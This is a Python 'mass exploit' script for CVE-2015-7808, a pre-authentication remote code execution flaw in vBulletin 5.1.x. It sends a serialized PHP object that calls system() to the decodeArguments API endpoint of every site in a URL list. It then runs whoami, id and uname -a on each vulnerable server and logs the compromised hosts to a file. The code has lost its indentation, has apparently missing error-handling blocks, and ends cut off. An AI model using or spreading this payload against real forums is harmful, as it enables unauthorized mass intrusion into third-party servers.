# Exploit Title : [Exploit] vBulletin 5.1.x - PreAuth Remote Code Execution
# Date : 11-09-2015
# Requirements : Python 3.4.x , Requests, Colorama
# Tested on : Windows 8.1 / Ubuntu 14.04
# CVE : CVE-2015-7808
# Blog Post : http://mukarramkhalid.com/exploit-vbulletin-5-1-x-preauth-remote-code-execution/
# Url list : http://makman.tk/vb/urls.txt
import requests, re, sys
import colorama
from colorama import *
from urllib.parse import urlparse
from time import time as timer
from functools import partial
from multiprocessing import Pool
def banner():
print( '\n' )
print( '++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++' )
print( ' [Mass Exploit] VBulletin 5.1.x ' )
print( ' MakMan -- http://mukarramkhalid.com -- http://fb.com/makmaniac ' )
print( '++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++' )
print( '\n' )
def inject( u ):
# Formatting URL
if '/forum/' in u:
url = u.split( '/forum' )[0] + '/forum/ajax/api/hook/decodeArguments'
turl = url[:-36]
elif '/Forum/' in u:
url = u.split( '/Forum' )[0] + '/Forum/ajax/api/hook/decodeArguments'
turl = url[:-36]
o = urlparse( u )
url = o.scheme + '://' + o.netloc + '/ajax/api/hook/decodeArguments'
turl = url[:-30]
r = requests.get( url, params = 'arguments=O:12:"vB_dB_Result":2:{s:5:"*db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"*recordset";s:11:"echo makman";}', timeout= 15 )
if 'makman' in r.text and len( r.text ) < 50:
r = requests.get( url, params = 'arguments=O:12:"vB_dB_Result":2:{s:5:"*db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"*recordset";s:36:"whoami;echo :::;id;echo :::;uname -a";}', timeout= 15 )
if len( r.text ) < 200:
print( Fore.RED + ' [+] URL : ' + Fore.GREEN + ' ' + turl )
print( ' ' + Fore.YELLOW + ' [+] WHOAMI : ' + Fore.CYAN + ' ' + r.text.split( ':::' )[0].strip() )
print( ' ' + Fore.YELLOW + ' [+] ID : ' + Fore.CYAN + ' ' + r.text.split( ':::' )[1].strip() )
print( ' ' + Fore.YELLOW + ' [+] UNAME : ' + Fore.CYAN + ' ' + r.text.split( ':::' )[2].strip() + '\n' )
return url + ':::' + r.text
return url + ':::' + 'Not Vulnerable'
return url + ':::' + 'Not Vulnerable'
return url + ':::' + 'Bad Response'
def main():
print (Style.BRIGHT)
count = 0
start = timer()
file_string = ''
final_result = []
# Make sure urls.txt is in the same directory
with open( 'urls.txt' ) as f:
search_result = f.read().splitlines()
print( 'urls.txt not found in the current directory. Create your own or download from here. http://makman.tk/vb/urls.txt\n' )
search_result = list( set( search_result ) )
print (' [+] Executing Exploit for ' + Fore.RED + str( len( search_result ) ) + Fore.WHITE + ' Urls.\n')
with Pool(8) as p:
final_result.extend( p.map( inject, search_result ) )
for i in final_result:
if not 'Not Vulnerable' in i and not 'Bad Response' in i:
count += 1
file_string = file_string + i.split( ':::' )[0].strip() + '\n' + i.split( ':::' )[1].strip() + '\n' + i.split( ':::' )[2].strip() + '\n' + i.split( ':::' )[3].strip()
file_string = file_string + '\n------------------------------------------\n'
# Writing Result in a file makman.txt
with open( 'makman.txt', 'a', encoding = 'utf-8' ) as rfile:
rfile.write( file_string )
print( 'Total URLs Scanned : ' + str( len( search_result ) ) )
print( 'Vulnerable URLs Found : ' + str( count ) )
print( 'Script Execution Time : ' + str ( timer() - start ) + ' seconds' )
if __name__ == '__main__':
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